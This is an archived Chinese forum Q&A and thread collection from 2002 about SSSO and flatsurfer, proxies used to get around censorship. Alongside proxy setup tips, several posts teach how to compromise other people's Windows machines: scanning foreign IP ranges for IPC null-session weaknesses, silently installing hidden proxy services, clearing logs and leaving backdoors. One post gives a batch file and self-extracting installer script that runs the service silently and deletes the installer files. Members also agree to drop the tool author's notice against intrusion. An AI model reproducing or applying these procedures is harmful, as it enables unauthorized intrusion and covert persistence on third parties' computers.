问答集

请推荐一款自带FTP的WEB服务器软件
这里有一个简易的命令行方式FTP服务器，只有19K：
http://rj.xrl.cc/list.asp?id=701

用流光4.7扫描结果不能存档.请问是怎么回事?
鼠标右键----保存

有能力的网友全面测试flatsurfer的安全性,就象以前测试snake跳板那样测试呗，查看所有的通讯数据，有没有任何可能的不安全因素。
白云 :非常安全，非常安全。和ssso一样都是只能探测到代理的ip，对于访问的ip、域名、数据等什么都不能被窥探。用Sniffer Portable 4.7做的测试。大家可以放心使用。

做ssso时，肉鸡的443被占用了，怎么办？
被占用了可能里面已经就是一个ssso了，你改什么端口啊，放弃

我用flat服务器上本论坛时老提示有不安全内容,要选择是或否,大家也这样吗:)?另外用这个代理上一般的常用软件怎么设置希望懂的分别详细说说,比如快车啊,蚂蚁啊:)REALPLAY啊:)等等.
回复：用https://会提示你有不安全内容，flashget设置代理——工具——选项——代理服务器——添加—— HTTP <get>——127.0.0.1:6700

1.为什么sss0做了证书以后，会更安全。在运行过程中并未觉察到做与不做的区别。
2.ssso的ssl通讯数据流是否有较明显的特征。
3.服务器端的1122端口是否还存在（4.0版）。
安全第一，安全第一啊！谢谢ssso程序的开发者与维护者。
白云 ：做了证书再上传安装ssso就和默认的证书不一样了。
ssso没有明显的特征。
socks端口不开放了，但存在。

WindowsMe可以用flatsurfer吗？可以用客户端吗？
可以，本地要做的事情——协议转换和数据发送似乎没有什么要用到winnt内核的东西。

学做SSSO没有做成,而自己却中招了,请高手看看!
请用net start看看，把结果告诉大家
说明：net start可以查看本机启动的服务，netstat -an是查看本地所有连接。如果你贴出来的东西没做过处理，那你就暴露了IP，还有，看你的信息不知你是在局域网内还是安装了WMWare。
root ：你的系统牢固吗？你应该用的是win2000吧，做SSSO用nt内核的操作系统，请参考我写的一篇安全建议，只要你的系统无漏洞，应该没有什么问题。检查一下你的机器开了什么端口？开了哪些服务？网上经常有人扫描的，经过你这里时，你的防火墙就有反映。

开始－－运行－－cmd,然后是用netstat -an 命令看一下儿，把结果告诉大家。
我是让你用netstat -an命令后把象这样的端口号贴出来：
Proto Local Address Foreign Address State
TCP 0.0.0.0:23 0.0.0.0:0 LISTENING
TCP 0.0.0.0:111 0.0.0.0:0 LISTENING
TCP 0.0.0.0:135 0.0.0.0:0 LISTENING
TCP 0.0.0.0:445 0.0.0.0:0 LISTENING
TCP 0.0.0.0:1049 0.0.0.0:0 LISTENING
TCP 0.0.0.0:1086 0.0.0.0:0 LISTENING

谁知道快速有效的找到肉鸡的方法
使用流光或ssso远程安装工具4.2自带的IPC扫描器，在一个中国以外的ip段扫描，一会儿就有了，IPC扫描器很方便的。

其实软件很容易上手，难点倒不在这里，自己的操作系统要用win2000或XP，且必须安装有SP3或其他的补丁，否则自己的操作系统漏洞多多，也许扫几个小时也找不到一个。。再有问题到论坛去发吧。
附：2000 SP3下载地址124M：
http://download.microsoft.com/download/win2000platform/SP/SP3/NT5/CN/W2Ksp3.exe

这个是干吗的？　　RPC-> 主机 194.205.59.86 端口 111 ...获取RPC信息成功，RPC？
请看这个：
http://www.bluedon.com/onlinescan/rpcscan.php3

ipc扫描器的一点小问题
我用ipc(跳板助手自带的)扫描主机时.有时会出现这样的情况,在下面的状态栏中,出现: *.*.*.*:start to check......然后长时间的没有反应,也不向下进行.除非手工关闭再跳过这个IP.
白云 ：一次不要扫太多，有目的的扫，最好不要扫超过1000，我一般就扫描255个，几乎每次都可以得到几十个肉鸡。

61.68.00.00这61.68是不是代表一人地方，后面两个就是这个地方的所有IP地址了？我用200线程扫。
root ：不一定，你最好去找一个全球ip分配表，上面会很明白的表明哪个ip段是哪个国家的。然后可以www.ipsprite.com再验证一下。

请问你是用何工具来验证系统是否win2000的？
sysinfo.exe,下载：
http://qxbbs.zapto.org:81/webup/sysinfo.exe

这样做有什么弊端吗：下达远程命令后，还没到远程主机运行程序的时间，就清除远程主机日志，再断开该IP连接。
没有弊端。

》》另外本地创建证书后，是不是证书已自动保存到S.EXE文件中？
白云：是的，创建完成就自动保存到s.exe里面了。

》》为什么不能在一部机子上同时使用跳板和ssso?
是因为2个的端口一样,把其中的一个端口改一下就可以了

》》ssso可以在win98se下用吗？我的机器是win98se，没有拨号连接，是和另一台win2000通过直接电缆连接上网的，我在win98se下安装了ssso3.6并设置好了代理可就是上不了网，请问有没有那位好心人解答一下？我在这里先谢谢了！
ssso3.6在98 里可以用。如果你的局域网里面的win98不需要任何设置代理就可以访问互联网就可以用ssso，局域网里面不需要设置代理就可以访问互联网的我只在winXP下搞成功过（服务器为xp，局域网其他机子系统不限）。

》》请教flatsurfer问题:我用的是98，flatsurfer也安装完成了，还需要其它的什么设置吗，比如IE，谢谢。
IE代理设置成：127.0.0.1:6700（默认），别的端口也可以，只是要和flatsurfer中的工作端口号一样。

》》请问我永久性用记事本打开了证书，我做不成不知与这个有关，可有办法把它改过来？
这个没关系的。注意填到flat的客户端软件中的是第一次生成的证书

》》谨慎使用公布的ssso，目前使用ssso的人还很少，如果有心人做个套是很方便的。如果新的ssso发布，能否将肉鸡里的文件名也动态生成一下。

一个关于ssso4.0禁止ipc null session的问题
4.0版说给肉鸡打了禁止ipc null session的补丁，是不是通过修改注册表实现的，那么也就是说得等肉鸡重起后才能生效。
另外请问大家现在用什么工具留后门？禁止了null session就一定得留一个后门了。
用telnethack.
telnethack要求“服务器开放IPC$共享”。如果IPC$共享被禁止了，肉鸡重起后下次要对肉鸡操作不就没戏了。

我用助手验证结果，总是显示“未成功”，但使用其结果，却是能行的。希望作者对此能加以改进
在WWW.INWAP.COM"上显示:REMOTE_PORT = 1074,FIREWALL:NORTON
端口是否是标准的1913端口，还有防火墙是否做了限制。
我也遇到过这样的问题：我用的是2000，出现过相似问题，我发现是应为 ssso和ssso助手没有安装到同一个目录下的原因，ssso助手现在只能安装到默认的文件夹下，所以不能验证成功，不只是不是这个原因？
助手在验证时需要stunnel-3.22.exe去验证，如过防火墙禁止了出站，那就不会成功。

SSSO可以自由发电邮给任何地方
用SSSO登陆国外的普通邮箱，因为SSSO是在本机加密出去的，所以可以把邮件发给任何被封锁的EMAIL地址。包括你想投稿给任何一个敏感网站都没有问题。我试过了。我现在就是这样用的。
不过你可不要用国内邮箱，因为国内邮箱的服务器在国内呢。

投稿敏感网站用Ssso再加上https://riot.eu.org/anon/remailer.html.en或http://www.no-id.com/remail.cgi会更好一些。这两个是网页，不留任何痕迹，前一个是ssl加密的更好。只是要能看懂一点英文。

》》我装了流光之后，诺顿说流光有木马病毒，请问这是怎么回事，要不要紧？谢谢。
不要紧，没有，他是这样说的。因为是黑客工具，里面有一些程序，所以他报告说有病毒

》》为什么ccproxy远程安装总是失败啊？
ccproxy5.2破解版，在自己机上运行是好的，传到服务器上就失败了，奇怪~
5.2破解版没什么问题，是不是端口冲突。
我关闭了DNS服务就好了，可能是和那边的冲突了

》》我用公布的SSSO服务器在IPC扫描器里再扫描一次为何无效了?
是否是我设置的原因,其他人如何?至今我都没有自己找到一个肉鸡,真急人!
由于已经给服务器打了补丁，所以扫不到了

》》建议乐助做个英文版的ssso-friend!在日韩的3389服务器上用ssso-friend，一堆乱码，连蒙带猜，太辛苦，现在只好回到命令行下敲键盘。
SSSOFriend1.52-E.zip
[url=https://qxbbs.zapto.org/webup/ssso/SSSOFriend1.52-E.zip]点击本地下载[/url]

》》为什么有的网吧不能运行ssso98版？安装没有问题，可是只要一运行，就提示bad command for files name怎么办？？
差不多弄清了。sc32启动不了是病毒或其他程序作怪。我在另外一台
机器上试了一下（同一网吧，采用的也是同样的设置）可以启动。
也可以重新下一个sc，将sc32.exe和sc32lnch.exe 复制覆盖掉ssso
目录中原来的。设置上除了socks server 设为127。0。0。1：1913
还需在protocol中设置socks version 5 的 Resolve all names remot
不过就不知这样安不安全。好象ssso中的sc。exe文件长度更小。

》》我今天作了几个用不了...
flatsurfer安装成功率很高的，比SSSO也好装，安几个都用不了？你再看看客户端的安装说明？

》我没用过e-Border Client ，不知道它到底比sockcape的性能怎么样，
之前我觉的“用了e-Border Client就不会用sockScap了”。因为有些软件sockScap不能用，而e-Border可以，今天发现e-Border 也有严重缺陷：DNS不能远程解析，并且也有些SOCKS5代理是sockScap可以用，而e-Border不能用的。
》如果stunnel也作成后台运行形式，开机启动，运行后不在右下方出现图标。
用3.0版+RUNHIDE就可以隐藏了。
你说的都是客户端吧。

flatsurfer0.25客户端（2002年12月13日）
http://jproxychain.no-ip.com/flatclient025.zip
flatsurfer0.25服务器端（2002年12月13日）
http://jproxychain.no-ip.com/flatbuilder025.zip
经过几天的测试，这个版本已经比较稳定了！
生成服务器端程序后，带/????????参数运行显示帮助信息。


精华专题浏览：ssso 3.61版推出

ssso 3.61版推出

您是本帖的第 2454 个阅读者
白云

ssso 3.61版推出
适用于win98以上所有操作系统，客户端和服务器端分开了。服务器端隐藏版中修改了stunnel名称，修改了一些小bug。下载 [image] http://fztd.tripod.com/r/sssoc361.zip
修改记录：修正了手工保存ssso代理后格式变化的问题。
http://fztd.tripod.com/ 这是主页
许多网友用WINXP上的SSSO，安了SSSO3。6是否还需要安网景浏览器？
回复：XP系统就要用，其他系统不用。
xunzhen 搭个便车：请用此地址下载sss03.61轻舟 [image] http://207.6.89.216/down/software/sssoc361.zip
可能要代理 ,感谢您！白云,我下载了98版后试用，发现速度很快，更换代理象跳板一样方便，太好了！
白云
下个版本打算把服务器端和客户端以及服务器安装工具分开，大家以为如何？
123 | 比较遗憾，我用xp，用ie还是没办法用域名访问，还是要多加一个国外的匿名代理才行，有些用ip是不能访问的，比如这个： http://babelfish.altavista.com/
JZX | JAP+SSSO能解决大部分问题
谷风 | 建议不要默认安装到c:\，服务器端和用户端分开下载，服务器端在上传前最好可以修改跳板的指向，使其在上传安装后可以指向另外一个跳板服务器，这样更安全一些。
沧海一粟 | 主要是stunnel-3.22.exe太惹眼了，改个隐蔽点的名字，ntservice.ini中要相应修改。
5000

我下了ssso3.6但是不会用，请高手赐教！！mailTo:qw5000@hotmail.com
thx最好在来点ssso服务器或socks5服务器！

回复：先安装软件, 安装后使用软件带的程序 CHANGE PROXY... 把里面数据 最后一行 修改为...比如: 把原数据改成 203.69.89.123:4043 保存好后，关闭文件. 然后打开该软件的 <小地球> (SSSO 3.61) 程序... 弹出2个窗口...只要点SOCKSCAP窗口里的 IE 浏览器就可以工作了... 如果这个使用代理后的浏览器能 正常浏览IE设置的 主页...就说明代理已经起作用. (可以用其他网站试验是否用代理的这个浏览器好用, 比如 GOOGLE ) 这个窗口内的 浏览器正常工作了... 您就可以自由遨游国际互联网咯. 恭喜咯!

到目前我用那个版本都不是理想，主要是不稳定。有是可用有时不可用，搞不懂为什么？
复：用的人多也是原因之一，如果是自己做的，看来你找到肉鸡也不太理想。

以下是引用cltflq在2002-11-15 14:40:54的发言：
请问NT操作系统可以做SSSO服务器吗？
我是自己的WIN2000上做了一个SSSO服务器，我是ADSL自动拔号网络，
所以IP是动态分配的，那不是我要获的自己做SSSO的IP，是不是每次都要WINIPCFG一次，
或者我讲错了，那应该怎么获的自己做的有效SSSO的IP呢？谢谢指教！(通过服务器中转)

你在自己的机子上做了一个ssso 服务器.你想要用ssso做什么?
这也不知道啊？提供给别人用呗！然后看谁试图用这个ssso访问敏感网站，捉人进大牢……哈哈，开玩笑，但也提醒大家，不要使用论坛上你不相信的人发布的ssso代理，尽量自己做，新版的远程安装工具包可能会更加傻瓜，非常容易掌握。

IE6的问题：登陆中文页面是乱码。现在用win2000、IE5.5、ssso3.61可以啦。
用win2000、IE6、ssso3.61不行，但以前用win2000、IE6、ssso3.6可以。


清心论坛--精华专题浏览：SSSO远程安装工具包?4.2

清心论坛 → 精华专题 → 浏览：SSSO远程安装工具包 4.2

您是本帖的第 1690 个阅读者
* 贴子主题： SSSO远程最新安装工具包
白云

等级：管理员
文章：112
积分：549
注册：2002-10-24

SSSO最新版请看这里：http://fztd.tripod.com/

SSSO远程安装工具包 4.3
下载： http://fztd.tripod.com/r/sssotool43.zip
本程序内含SSSO服务器端隐藏版、IPC漏洞扫描器和SSSO助手。用于远程制作SSSO代理服务器,即刻拥有自己的SSL加密代理服务器。必须首先安装ssso客户端才可以使用它的全部功能。

去除了被破坏后自动恢复安装的功能（一般都是网管发现后删除的，为什么要强人所难呢？）调整了结构，安装更稳定，体积更小巧。修正了服务器端的一个安装错误，内置最新版的ssso助手1.64d版。

这个应该是终结版了吧？因为flatsurfer真的很不错啊，体积小巧，安全性也很高。

sync

证书是不是非做不可?自己做和不做有什么区别?

白云回复：不做也能用，做了更安全

98版本的什么时候能推出啊?
这样我也可以给大家做一些ssso
白云回复：不会出的了，98没有NT内核，无法运行ipc等程序
白云
大家希望不希望给肉鸡加漏洞补丁呢？反正有利有弊，加上后连自己也没有办法登陆了。
小张 | 我不懂登陆是什么意思，我的希望是肉鸡能成为ssso服务器就行了，还有有效期要长久，不容易被破坏，最好还能匿名，就这么多了。其他的我无所谓了。
ASD | 打上补丁好，以前我做的全部留有后门，但发现根本不用，因为网管发现跳板并停下来，就是在进去重新启动也会被很快kill。
JZX | 要吧，我们只要他的这一点功能就够了，没必要保留其他的功能。否则公布代理后很容易被一些别有用心的人破坏，对机主也不利，是吧？
白云 | 这样，只给他打个禁止空连接的补丁，这样别人扫描不到他，我们也可以进去。
SYNC

希望看到3.8版尽快推出. 还提出一个要求,新版本在安装时不要覆盖掉原来的数据,例如安装助手1.5原来保存的可用IP仍然在结果调度项里继续使用.
乐助：新版的助手改变了原有的数据库结构，要想保留原来的结果只需用Access将“跳板端口”这项去掉就可以了，如果还用老的数据库也没有问题

在安装ssso远程服务器时顺便给服务器打了禁止空连接的补丁。似乎没起作用啊!做了SSSO后仍然可以扫描到,也仍然可以连接.
回复. 肉鸡要重启后才行。

大兰 原用SSSO远程安装工具包 3.7安装的服务器,可用4.0再安装吗?
回复：可以的
asd

第25楼
我用4.0原版做的一个ssso服务器，还是不能访问ssl站点，而用跳板代替就可以，建议测试一下，看看是否有这个bug。测试之前最好用清道夫清理一下。

原因查明，用IP可以访问ssl站点，用域名不行。
测试环境：w2k server sp3、IE6 sp1、ssso客户端3.61、MYIE3.2DC。

沧海一粟 确实有此问题，测试环境:enw2k pro sp3 ie5.01 ssso客户端3.0 myie32dc

白云 :是你的IE6.0的问题，所谓XP系统不能使用域名访问，其实就是IE6.0不能，改为IE5.*就好了。

雨天 我用4.0原版做的一个ssso服务器,用ssso助手验证,出现如下提示:
------------------------------------------
★运行指令:
验证SSSO代理
正在与127.0.0.1:1913创建socket连接
成功创建socket连接
正在连接 socks5 服务器
成功连接 socks5 服务器
与远程测试主机ip连接
验证成功!
关闭 socket 连接。
★★恭喜!★★SSSO代理验证成功!
-------------------------------------------------
可是打开ssso3.61,出现无法连接的现象,该页无法显示,而用以前作的ssso就可以,
在结果调度中测试结果都正常,也用了使用该结果.
再运行ssso3.61,就打不开网页了.
我的意思是说,用sssotools4.0作好的ssso服务端在ssso助手里测试都正常,可是使用该结果后就无法打开网页.而用sssotools3.x作好的ssso服务端在ssso助手里测试也正常,使用该结果后就可以打开网页.请问会这是什么原因?

测试环境：w2k server sp3、IE6 sp1、ssso客户端3.61
白云 我在各种测试中也多次遇到过，可能是系统的某些问题导致了ssso助手的验证错误
一切都是新的 证书创建后需要上传吗？刚找到几个肉鸡，这方面不明白。
古风回复：下一步就是上传文件。
sync 在对扫描出来的肉鸡进行连接时,有时会有这样的提示:
NET USE
[devicename | *] [\\computername\sharename[\volume] [password | *]]
[/USER:[domainname\]username]
[/USER:[dotted domain name\]username]
[/USER:[username@dotted domain name]
[/SMARTCARD]
[/SAVECRED]
[[/DELETE] | [/PERSISTENT:{YES | NO}]]

NET USE {devicename | *} [password | *] /HOME

NET USE [/PERSISTENT:{YES | NO}]

这表示什么意思?
jzx 回复：可能是ip后面有空格，不能有空格。我碰到几次，都是因为有空格


清心论坛--精华专题浏览：[推荐]新型破网工具flatsurfer?0.1

清心论坛 → 精华专题 → 浏览：[推荐]新型破网工具flatsurfer 0.1 您是本帖的第 1895 个阅读者

qingxin9

等级：新手上路
文章：3
积分：72
注册：2002-10-31
[推荐]新型破网工具flatsurfer 0.1
自助冲浪作者新推出一个破网工具flatsurfer 0.1（主页还没有公布），特点如下：

1、同一个端口同时作为HTTP代理和SOCKS5代理，自动识别，省去了协议之间来回转换的麻烦。
2、HTTP代理实现了GET、POST和CONNECT命令。
3、SOCKS5代理实现了CONNECT、BIND和UDP ASSOCIATE命令。
4、远端解析域名。
5、通信过程就象网友在浏览普通网页，没有通信特征，使嗅探程序失效。
6、高强度公开加密算法，网友使用时更放心，并能作为其它优秀软件的加密隧道组合使用。
7、服务器端采用高稳定编程技术，最多同时支持2000个连接，大约10000个在线浏览器用户。
8、远端服务器真实身份验证功能，确保网友是在与真实可靠的远端服务器通信

分为服务端和客户端两部分，服务端可安装在NT平台上，并把公钥公开，使用者运行客户端并把公钥填入即可。

详情请看说明文件。点击下载

白云 非常棒！可以取代ssso了，我马上做了一个，好极了。
作者说明文件最后的那个“请注意 本站提醒广大网友合法使用本软件，不应该去入侵别人的计算机，即使不破坏也不好呀。“我看就去掉吧。要看总体效果。
善缘 同意白云的意见，我们这么做也是不得已而为之。有个公正的环境，谁愿意费这个劲。
这个软件体积小，又是以服务方式启动，只可惜没有跳板的级联功能。
命令行下如何更改服务器端口呢？
请问：如何制作WINRAR压缩包？
主要是如何自己使用WINRAR制作压缩包，然后就可以用乐助的SSSO－FRIEND做FLATSURFER服务器了。这样比较简单。

白云

 客户端和服务器总体体积是ssso的总体的近三分之一，速度不相上下，功能要比ssso多一点，方便性相当。总体看来我认为可以代替ssso了，可以浏览、ftp、MSN等，但没有试验过发信，应该没问题。唯一的缺憾就是作者没打包成适合在远程安装的方式，目前我们自己先干著：编辑一个bat文件：

flatserver /install /silent
net start flatservice
del flat.bat

保存为flat.bat。
把生成的公钥私钥和flatserver.exe、hiderun.exe（ssso服务器端里面有）、flat.bat打包成rar的自释放格式，名称：flat.exe 脚本命令是：

Path=.\%systemroot%\system32
SavePath
Setup=hiderun flat.bat
Silent=1
Overwrite=2
Delete=flatcert.pk
Delete=flatcert.sk
Delete=flat.bat

好了，上传运行这个文件就完成了。

白云

ssso4.2里面的s.exe设置的最完美。
乐助 Delete=flatcert.pk
Delete=flatcert.sk
如果这样好像就不能运行了

白云:可以的，这是为了防止服务器上已经安装过了的防范措施，如果服务器上安装了，强行覆盖安装会出错，而这个就会采用跳过已有文件的方式，并首先删除文件夹里面的这三个文件，以免证书不符，再安装就不会出问题了。
白云 | 当然如果有新版本，这样又会过时，还是要采用覆盖的方法安装，但那个启动文件里面要加入探测是否有老版本的功能，有的话就先卸载停止服务再安装，方法可参考ssso4.2里面的那个run.bat文件。
密匙文件一定要放在system32下，放在同一个目录都不行。
白云 | 主要是作者还没有打包成容易在远程安装的方式，一般新手自己配置容易出错导致的，希望作者尽快改进成远程安装的形式。
ASD | 有个建议：不用服务端，作一个服务端生成文件，这个生成文件经过配置后生成服务端，配置内容可以包括：服务名、显示名、服务端口、服务端文件名，而且把公钥和私钥集成在里面，并显示公钥部分便于公布；加入安装验证密码，就是在服务端安装时，需要给出密码才可以安装。经过这样配置后，这个服务端就是独一无二的，别人不可能偷取你的公钥和私钥，然后已你的名义提供服务端。 这个配置的想法主要来自于winshell。
古风 flat.bat中我又加了二行，删除安装后的无用文件：
del hiderun.exe
del flat.exe
全文如下：
flatserver /install /silent
net start flatservice
del hiderun.exe
del flat.exe
del flat.bat
白云兄能给我个地址吗？谢谢先。再次拜托。
白云　回复: 我不提供代理，只教你怎么做。
root 成功的安装了一个,确实很好用.速度很快.不知道这样做是否可以?
用ssso代理启动myie,然后在myie中把代理设为127.0.0.1:对应服务器端口号,不知道这样是否既使用了SSSO,也使用了该工具?安全性更强呢?请高手解答!
古风 关于flatsurver客户端设置
IE里代理设置成127.0.0.1：6700(默认)。把flatclient和flatcert放在同一个目录中，运行flatcert.exe生成一对客户端用的证书，然后启动flatclient.exe,注意把原来生成的第一个公钥（上传的那一个）填入公钥一行中，运行，启动IE上网
aaa | 需要用记事本打开公钥，然后把里面的数字复制到客户端的那个框里面。
javaone 入侵的问题保留意见，但尊重各位不得以的做法。命令行下更改服务器端口的要求很快就可以做到。
级联真的有必要吗？请给出你的理由来:-)
做一个linux版是否有必要？会支持更多并发连接，速度更快。请讨论。
下一版本中客户端不用单独生成证书了，只要一个flatclient.exe即可，使用会更方便，0.1版还得生成两次证书(一边一个)。
我这里有问题，启动的时候，总是显示服务无法启动，2台机器都测试，均无法启动服务，请问各位是否也遇到这种问题？如何解决？
回复：两个钥匙文件都传上去，都要考到SYSTEM32目录里面去才能行的。
laocai | 唉，终于成功了，是要两次生成证书。
运行的文件，最好不要先压缩处理，给使用者一点空间，可自行用不同的方法压缩加密，尽量避免雷同的特征码。不然，又是一些杀毒软件的买点啦。
javaone flatsurfer0.2版已经完成，正在测试。
客户端只有一个flatclient.exe，不用生成客户端证书了，实现了最多三级级联功能，应该够用了。
服务器端只有一个flatserver.exe，可以作为自定制启动参数的NT服务运行，也可以单独带参数运行，这样在win95、win98、winnt、win2k、winxp上都能运行了，多人的服务器端程序可以互不干扰地运行。
现在有一个技术问题请教，如果作为nt服务运行，各项参数不可避免地存放在文件中或注册表中，别人就可以知道公开钥匙和私用钥匙了，不安全；如果单独带参数运行，可以把公开钥匙和私用钥匙的内容作为命令行参数输入，不用存放到文件或注册表中，很安全，但重启机器后无法自动加载运行，请高手解答。
QFL861 1. 辛苦了，非常感谢。
2. 三级级联功能，够用了！
3. 作为NT服务运行，各项参数放在一个生成的加密压缩文件中应该是可行的，文件名可由用户在命令行参数中自行指定，多个用户也不会相扰了；
4. 也可以采用asd的建议，参照WinShell(http://peckerland.com/)的方法，配置参数后，生成服务器端运行程序，各项参数在运行程序的文件中(嵌入的RC资源做参数？？，也应该加密吧)。

第3条方法应该简洁一些，使用者可采用白云同学的方法，用winrar打包运行程序以及配置文件，生成一个自解压的上传文件


SSSO-Friend-1.64c （12.8更新）测试及意见反馈

清心论坛 → 精华专题 → 浏览：SSSO-Friend-1.64c （12.8更新）测试及意见反馈

您是本帖的第 1061 个阅读者
* 贴子主题： SSSO-Friend-1.64c （12.8更新）测试及意见反馈
乐助 帅哥哟，离线，有人找我吗？

等级：管理员
文章：150
积分：337
注册：2002-10-23
楼顶
SSSO-Friend-1.64c （12.8更新）测试及意见反馈
为了减轻白云的负担，以后将在这里公布SSSO-Friend 的测试版本，希望大家多提意见，我们会尽力改进的，但是由于能力有限可能很多要求很难满足，还希望大家谅解！

1.64c版提供下载。更新如下：
修正了“水滴”提出的1、3、4、错误，第2条由于地方太小就算了吧：），谢谢大家的建议

1.64b版。首先，谢谢大家的回帖！感谢大家提供测试的结果，谢谢大家了！
更新如下：
1、修正了大家提出的错误
2、暂时去掉了检测系统版本的功能，他太慢了（谢谢QFL861提供的源代码，但是目前我还没来得及用它，因为好像只能用来检测本地的系统？我在研究研究…）
3、排序功能修正
4、成功完成IPC连接后，可自动设定远程运行时间
5、数据库中state参数的解释：
以后将都是数字（为了排序），一般来说，数值在100以下速度还可以，超过100就别用了，速度超过150，基本就是对方不在线，或端口不对…“888”表示未定，“9999”表示失败。另外，批量测试还不完善，主要是超时方面的设定问题，碰到几个不在线的IP可能要等很长时间。另外，如果测试还未结束，您就象关闭程序的话，有可能会剩下几个进程还在运行，请用Ctrl+Alt+Del关闭，名称是stunnel-3.22.exe，这也是我没有解决的几个问题，哪位有办法请提提！谢谢啦

由于1.63的错误太多，所以我想暂时集中精力去除Bug，做一个稳定的版本，希望大家多多指教，如果哪位有兴趣参与开发这个小程序，欢迎跟贴，我将提供源代码。但是目前只限于和“同学”，因为这个软件比较敏感，谢谢…！

安装：解压缩到SSSO TOOLS目录即可。如果你用的是1.61版以前的SSSO.mdb，需要将结果导出，然后再用1.64b导入结果就行了。

改进如下：
1、增加了检测程序完整性功能
2、数据库中的结果不能重复，否则无法添加
3、修正了几个错误
4、新增导入结果功能，这样大家就方便多了！
自动排序功能有问题，目前还不完善。

完整的SSSO-Friend 1.62应包含以下文件才能运行所有功能：

stunnel-3.22.exe、openssl.exe、openssl.cnf、libssl32.dll、libeay32.dll、clearlogs.exe、Psinfo.exe（以上文件可以在SSSO服务器端中找到）
点击下载
************************************************
[SSO.mdb点击下载
SSSO-Friend.exe点击下载
（以上文件是此次次更新时的主文件）

目前SSSO-Friend 1.64b 支持Win2000以上的操作系统。
注：古风同学提醒大家，最好不要使用默认的1913端口运行SSSO，因为这个端口太有名了，请大家自己修改一下SockCap32和SSSO的端口。

点击查看用户来源及管理<br>发贴IP：a.b.c.d 2002-11-28 12:22:23
鲜花(0) 鸡蛋(0)
sync 帅哥哟，离线，有人找我吗？

等级：新手上路
文章：69
积分：270
注册：2002-10-30
完蛋了,不能用了,原来的数据都不见了.
一启动软件,就提示:不可识别的数据库格式''''C:\PROGRAM FILES\SSSO TOOLS\SSSO.MDB''''.
★帮助提示:在当前目录下找不到下列文件之一："stunnel-3.22.exe、openssl.exe、openssl.cnf、libssl32.dll、libeay32.dll",部分功能将无法使用！怎么办?

还有,将SSSO.mdb用Access按照新的格式改好.怎么改?
回复：用Access2000打开SSSO.mdb，选中Result表，右键点击，选择“设计视图”，然后参照新旧SSSO.mdb的“字段名称”修改旧的SSSO.mdb就可以了

aaa 帅哥哟，离线，有人找我吗？

等级：新手上路
文章：18
积分：137
注册：2002-11-13

stunnel-3.22.exe、openssl.exe、openssl.cnf、libssl32.dll、libeay32.dll
（以上文件可以在SSSO服务器端中找到）
小开 帅哥哟，离线，有人找我吗？

你应该先把数据导出保存为txt格式，放到其他地方，然后再一个一个输入回去。
2002-11-28 13:16:07
sync 帅哥哟，离线，有人找我吗？

等级：新手上路
文章：69
积分：270
注册：2002-10-30

以下是引用小开在2002-11-28 13:16:07的发言：
你应该先把数据导出保存为txt格式，放到其他地方，然后再一个一个输入回去。

还好我有导出结果.但......现在连一个个输入都不允许啊!仍然提示"找不到下列文件之一："stunnel-3.22.exe、openssl.exe、openssl.cnf、libssl32.dll、libeay32.dll",部分功能将无法使用！".可那些文件明明有的.真是7456!
另外,对于出现的"不可识别的数据库格式''C:\PROGRAM FILES\SSSO TOOLS\SSSO.MDB'',也是很奇怪,原来的已经替换掉了,还不可识别吗?新的IP数据我可没能力添加进去啊.
不得不,我又回到1.61.

2002-11-28 13:49:58
sync 帅哥哟，离线，有人找我吗？

等级：新手上路
文章：69
积分：270
注册：2002-10-30

1.63版新增加的批量验证功能看来还有些问题.我对原作者保存在程序里的若干IP进行验证,发现它不能完整验证所有数据,也不能自动排序.
2002-11-28 19:07:54
乐助 帅哥哟，离线，有人找我吗？

等级：管理员
文章：150
积分：337
注册：2002-10-23

以下是引用sync在2002-11-28 19:07:54的发言：
1.63版新增加的批量验证功能看来还有些问题.我对原作者保存在程序里的若干IP进行验证,发现它不能完整验证所有数据,也不能自动排序.

批量验证错误已修改，是由于排序的问题引起的。但是排序问题暂时还解决不了。

----------------------------------------------
最近比较忙，可能有留言的没时间回复了，请多多原谅！谢谢！
有事请留言，我不用其他方式联系，谢谢！

2002-11-28 20:15:27
johnchang 帅哥哟，离线，有人找我吗？

用该助手验证一个地址，本地端口自动占用一个，导致真正的SSSO不能用，或者让SOCKSCAP跟着变端口，真是有趣。
2002-11-28 21:22:13
乐助 帅哥哟，离线，有人找我吗？

等级：管理员
文章：150
积分：337
注册：2002-10-23

以下是引用johnchang在2002-11-28 21:22:13的发言：
用该助手验证一个地址，本地端口自动占用一个，导致真正的SSSO不能用，或者让SOCKSCAP跟着变端口，真是有趣。

目前1.63在验证时，以给出的默认1913进行验证，如果发现该端口已打开，则会以递增的方式搜索未打开的端口，比如，你给出的是1913，而1913已被打开，则程序改为1914、1915、1916…直到未被占用的端口为止，如果你怕影响SSSO默认的端口1913，可以将指定的端口大于1913就可以，或者先运行SSSO，再运行验证，就不会有问题的

----------------------------------------------
最近比较忙，可能有留言的没时间回复了，请多多原谅！谢谢！
有事请留言，我不用其他方式联系，谢谢！

2002-11-28 23:09:03
乐助 帅哥哟，离线，有人找我吗？

等级：管理员
文章：150
积分：337
注册：2002-10-23

1.64版预告：
1、修正排序功能，但是又要改动数据库了，没办法…，目前已完成。
2、增加自动下达计划功能，就是程序可以自动根据远程时间来下达计划了，目前已完成（但是只在中文版2000Pro上测试通过，其他操作系统还未测试）。
3、检测主机操作系统的问题：目前采用调用Psinfo.exe的方法很不理想，速度太慢，不知哪位同学还有更好的方法？
目前想通过下载对方系统目录中的某个文件来判断，不知哪个文件能提供这类信息？

----------------------------------------------
最近比较忙，可能有留言的没时间回复了，请多多原谅！谢谢！
有事请留言，我不用其他方式联系，谢谢！

2002-11-28 23:19:22
QFL861 帅哥哟，离线，有人找我吗？

等级：新手上路
文章：95
积分：282
注册：2002-10-23
远程读注册表如何？未试过，本地获取的简单代码如下：

procedure TForm1.UserInfo1Click(Sender: TObject);
Var
KeyStr: string;
Reg:TRegistry;
begin

KeyStr:= ''Software\Microsoft\Windows NT\CurrentVersion'';

Reg:=TRegistry.Create;
Reg.RootKey:=HKEY_LOCAL_MACHINE;
Reg.OpenKey(KeyStr,False);
Memo1.Lines.Add('' '');
memo1.Lines.Add(''操作系统类型: ''+ Reg.ReadString(''ProductName''));
memo1.Lines.Add(''注册的属主: ''+ Reg.ReadString(''RegisteredOwner''));
Reg.CloseKey;

Reg.OpenKey(''SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon'', False);
memo1.Lines.Add(''当前用户: ''+ Reg.ReadString(''AltDefaultUserName''));

Reg.CloseKey;
Reg.Free;
end;

[此贴子已经被作者于2002-11-29 11:24:33编辑过]
2002-11-29 11:23:06
jzx 帅哥哟，离线，有人找我吗？

